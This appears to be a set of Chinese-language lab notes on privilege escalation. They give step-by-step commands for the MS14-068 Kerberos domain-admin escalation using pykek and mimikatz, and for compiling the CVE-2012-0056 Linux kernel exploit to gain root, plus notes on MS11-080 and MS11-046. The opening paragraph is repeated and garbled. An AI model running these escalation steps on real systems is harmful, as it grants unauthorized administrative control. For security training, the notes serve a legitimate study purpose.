操作系统 还有一些操作系统软件
操作系统内核对用户的进程权限控制不严格造成的
proc目录 不是在系统内存中实时生成的 只有硬盘启动才 有关机存在 启动会在linux生成的一个临时文件 保存的很多当前操作系统的内存运行数据 本身就是内存映射的数据 在linux 操作系统运行很多程序的时候 都会子操作系统里面生成很多 这个程序对于的pid值me
凡是所有高于2,6.39都存在这个漏洞 低于这个版本且很少
如何去执行 利用 利用代码
操作系统 还有一些操作系统软件
操作系统内核对用户的进程权限控制不严格造成的
proc目录 不是在系统内存中实时生成的 只有硬盘启动才 有关机存在 启动会在linux生成的一个临时文件 保存的很多当前操作系统的内存运行数据 本身就是内存映射的数据 在linux 操作系统运行很多程序的时候 都会子操作系统里面生成很多 这个程序对于的pid值me
凡是所有高于2,6.39都存在这个漏洞 低于这个版本且很少
如何去执行 利用 利用代码
Ms11-080: searchsploit
用于XP 与 2K3 ENG 的提权漏洞
Pyinstaller:其本身是一个py脚本,需要py环境
Https://pypi.python.org/pypi/Pyinstaller/2.1
用于将PY漏洞利用脚本转换为EXE
使用时加上 --onefile 这个选项,这样才能将目标需要的库环境加载到一个文件
Pywin32:
Http://sourceforge.net/projects/pywin32/files/pywin32/build%20219/
Pyinstaller需要的一个软件
Ms11-046:
用于DOS攻击
Ms14-068:
在拥有主机的管理员权限的条件下,通过该漏洞获得域管理员权限
库(Kali中使用脚本缺少库解决方法,下载后放到python目录)
Https://github.com/bidord/pykek
实验步骤:
1、使用win 7(过程中关闭防火墙,防止干扰)作为域中普通用户,2k8 server作为域控制器(运行-dcpromo:安装域控制器)
2、searchsploit
3、通过脚本生成票据文件:
ms14-068.py -u user@domain.com -s userSID -d domian.com(完整的域控制器域名或者IP)
4、将3生成的票据拷贝到Windows中
5、在本地管理员用户(非域账户)下
mimikatz.exe log “kerberos::ptc TGT_user@domain.com.ccache” exit
然后在本地管理员用户下具有了域控制权限
注意:
步骤3中最后的域控制器完整域名,要求我们使用脚本的计算机能够解析,如果不行则使用IP,但是要求计算机与域控制器在同一IP地址段
步骤3中的userSID,可以通过whoami.exe /all 或者其他工具查找
Ubuntu 11.10:unix内核漏洞,进程的内存控制不严格
kernel>=2.6.39
该漏洞文章:http://blog.zx2c4.com/749
http://old-releases.ubuntu.com/releases/11.10/
Gcc:
sudo apt-cdrom add && sudo apt-get install gcc
gcc 18411.c -o exp
本次利用漏洞:
CVE-2012-0056
步骤:
1、在kali中找到可利用漏洞的利用代码:
2、将其复制到Ubuntu(Ubuntu server)中:
3、gcc 18411.c -o exp:
生成可执行程序,运行之后就为root用户
scp /usr/share/exploitdb/platforms/linux/local/18411.c yuanfh@192.168.1.149: /home/yuanfh/
//调用ssh进行传输
sudo apt-cdrom add //将光盘加入更新源